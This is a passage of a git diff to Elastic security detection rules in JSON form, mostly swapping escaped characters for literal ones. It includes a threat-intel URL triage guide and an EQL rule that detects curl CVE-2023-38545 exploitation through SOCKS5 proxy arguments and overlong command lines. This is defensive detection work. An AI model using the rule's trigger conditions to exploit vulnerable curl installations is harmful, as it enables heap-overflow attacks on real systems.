Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. 
Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - 
Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. 
When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path 
WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. 
Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "url.full:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -125,7 +125,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json index 97db950c85b..ae23b5875b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json +++ b/packages/security_detection_engine/kibana/security_rule/f3e22c8b-ea47-45d1-b502-b57b6de950b3_4.json 
@@ -17,7 +17,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel URL Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. \n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. 
Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - 
Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel URL Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a URL indicator from the Threat Intel Filebeat module or a threat intelligence integration matches against an event that contains URL data, like DNS events, network logs, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the URL, which can be found in the `threat.indicator.matched.atomic` field:\n - Identify the type of malicious activity related to the URL (phishing, malware, etc.).\n - Check the reputation of the IP address in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. 
\n - Execute a WHOIS lookup to retrieve information about the domain registration and contacts to report abuse.\n - If dealing with a phishing incident:\n - Contact the user to gain more information around the delivery method, information sent, etc.\n - Analyze whether the URL is trying to impersonate a legitimate address. Look for typosquatting, extra or unusual subdomains, or other anomalies that could lure the user.\n - Investigate the phishing page to identify which information may have been sent to the attacker by the user.\n- Identify the process responsible for the connection, and investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the involved process executable and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User 
Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- False positives might occur after large and publicly written campaigns if curious employees interact with attacker infrastructure.\n- Some feeds may include internal or known benign addresses by mistake (e.g., 8.8.8.8, google.com, 127.0.0.1, etc.). 
Make sure you understand how blocking a specific domain or address might impact the organization or normal system functioning.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Consider reporting the address for abuse using the provided contact information.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "url.full:*\n",
 "references": [
 "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html",
@@ -125,7 +125,7 @@
 ]
 }
 ],
- "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"",
+ "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and threat.indicator.url.full:* and not labels.is_ioc_transform_source:\"true\"",
 "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e",
 "timeline_title": "Generic Threat Match Timeline",
 "type": "threat_match",
diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json
index d0546dd04b9..1c475f65934 100644
--- a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_1.json
@@ -3,7 +3,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version \u003c= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version \u003e= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.",
+ "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.",
 "from": "now-9m",
 "index": [
 "logs-endpoint.events.*"
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential curl CVE-2023-38545 Exploitation",
- "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) \u003e 255\n",
+ "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255\n",
 "references": [
 "https://curl.se/docs/CVE-2023-38545.html",
 "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json
index 93313420772..76113abda20 100644
--- a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_2.json
@@ -3,7 +3,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version \u003c= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version \u003e= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.",
+ "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.",
 "from": "now-9m",
 "index": [
 "logs-endpoint.events.*"
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential curl CVE-2023-38545 Exploitation",
- "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) \u003e 255\n",
+ "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255\n",
 "references": [
 "https://curl.se/docs/CVE-2023-38545.html",
 "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json
index 5804240c2bd..bdb61863416 100644
--- a/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/f41296b4-9975-44d6-9486-514c6f635b2d_3.json
@@ -3,7 +3,7 @@
 "author": [
 "Elastic"
 ],
- "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version \u003c= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version \u003e= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.",
+ "description": "Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule.",
 "from": "now-9m",
 "index": [
 "logs-endpoint.events.*"
@@ -11,7 +11,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Potential curl CVE-2023-38545 Exploitation",
- "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) \u003e 255\n",
+ "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and process.name == \"curl\" \nand (\n process.args : (\"--socks5-hostname\", \"--proxy\", \"--preproxy\", \"socks5*\") or \n process.env_vars: (\"http_proxy=socks5h://*\", \"HTTPS_PROXY=socks5h://*\", \"ALL_PROXY=socks5h://*\")\n) and length(process.command_line) > 255\n",
 "references": [
 "https://curl.se/docs/CVE-2023-38545.html",
 "https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json
index 22fd9d6c64e..5100a0904ea 100644
--- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_102.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json
index 82b7709e673..0a70e5bb7b7 100644
--- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_103.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json
index e3c5fdb6673..1fcc0d9b849 100644
--- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_104.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
